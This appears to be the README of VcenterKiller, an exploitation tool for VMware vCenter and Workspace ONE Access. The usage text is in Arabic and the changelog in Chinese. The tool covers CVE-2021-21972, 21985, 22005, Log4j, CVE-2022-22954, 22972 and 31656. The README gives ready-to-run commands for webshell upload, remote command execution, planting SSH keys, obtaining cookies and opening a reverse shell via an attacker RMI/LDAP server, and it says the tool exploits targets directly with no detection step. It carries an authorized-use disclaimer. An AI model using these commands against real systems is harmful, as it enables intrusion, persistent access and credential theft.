
أداة استغلال شاملة تستهدف Vcenter، تتضمن أحدث الثغرات الرئيسية: CVE-2021-21972 وCVE-2021-21985 وCVE-2021-22005 وثغرات One Access: CVE-2022-22954 وCVE-2022-22972/31656 وlog4j. توفر رفع webshell بنقرة واحدة، تنفيذ الأوامر، أو رفع المفتاح العام لاستخدام اتصال SSH بدون كلمة مرور.
أيها الإخوة الذين يقومون بإعداد بيئة الثغرات محليًا، فإن استخدام vckiller للتحقق من log4j سيفشل غالبًا، لأنه في بيئة VMware مع وضع NAT، سيتم تحديد بطاقة الشبكة الصادرة لوحدة التحقق على أنها 127.0.0.1، وبالتالي يصبح عنوان خادم LDAP الذي يصل إليه الهدف 127.0.0.1، مما يؤدي إلى فشل التحقق 😏
إذا واجهت أي خطأ، يرجى فتح issue. هذه الأداة تم إنشاؤها فقط للراحة، ولا تحتوي على أي شيء معقد.
أداة تحقق شاملة تستهدف Vcenter، وتشمل الثغرات الأكثر شيوعًا حاليًا CVE-2021-21972 وCVE-2021-21985 وCVE-2021-22005، وتوفر رفع webshell بنقرة واحدة، وتنفيذ الأوامر، أو رفع مفتاح عام واستخدام اتصال SSH، بالإضافة إلى الكشف والاستغلال لثغرة Apache Log4j CVE-2021-44228 على Vcenter، مثل تنفيذ الأوامر والحصول على ردود (يتطلب خادم ldap ضار)، الآن لا تحتاج إلى تشغيل خادم ldap إضافي، لقد صنعت طريقة استغلال بناءً على أداة jndi-injection، الوسيط المستخدم في Vcenter هو Tomcat، فقط استخدم سلسلة استغلال TomcatBypass.
عادةً ما تكون Vcenter موضوعة في الشبكة الداخلية، وخصائص الثغرات شائعة جدًا، مثل fscan التي تكشفها عند المسح، لذا فإن VcenterKiller ليس مصممًا لاكتشاف ما إذا كان الهدف يحتوي على ثغرات، بل يحاول استغلالها مباشرة، ويتم تنفيذه عادةً عبر CS/MSF على قفزة، لذلك تمت إزالة المخرجات المبالغ فيها. لماذا GO؟ لأن Python سهل الكتابة ولكنه مزعج في الاستخدام، مع العديد من المكتبات التابعة، وحجم الترجمة كبير جدًا، و C# لا يمكنه العمل عبر الأنظمة الأساسية، تم التخلي عنه بعد الكتابة.
go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //رفع المفتاح العام
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // فحص log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //يمكن أيضًا عدم تحديد خدمة ldap
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 //الحصول على cookie
./main.exe -u https://xx.xx.com -m 31656 //إذا تعذر استخدام CVE-2022-22972، فاستخدم CVE-2022-31656
هذه الأداة موجهة فقط لأنشطة بناء الأمان المؤسسي المرخصة قانونيًا، مثل تمارين الهجوم والدفاع الداخلية، والتحقق من الثغرات وإعادة الاختبار. إذا كنت بحاجة لاختبار قابلية استخدام الأداة، فيرجى إعداد بيئة هدف بنفسك. عند استخدام هذه الأداة للكشف، يجب عليك التأكد من أن هذا الإجراء يتوافق مع القوانين واللوائح المحلية، وأنك حصلت على التفويض الكافي. يرجى عدم استخدامها على أهداف غير مرخصة. إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، ستتحمل المسؤولية الكاملة، ولن نتحمل أي مسؤولية قانونية أو تبعية.
V1.0 上线
V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能,前提是你要启动一个rmi服务器,例如jndi-injection-exploit
V1.2 增加了针对Vcenter的log4j检测和验证能力
V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过
V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口
V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。
V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了
v1.3.4 修改了对log4j的验证逻辑,目前的逻辑是循环5次不同payload无差别乱打,有回显就有,没有就没有
v1.3.5 消除了log4j对Jndi-Injection-Exploit的依赖,能够直接执行命令并获取回显
v1.3.6 针对21972的ssh功能进行了修改并优化了其他细节
v1.3.7 添加了代理功能,支持http和socks
v1.3.8 还未开始,考虑添加功能...
...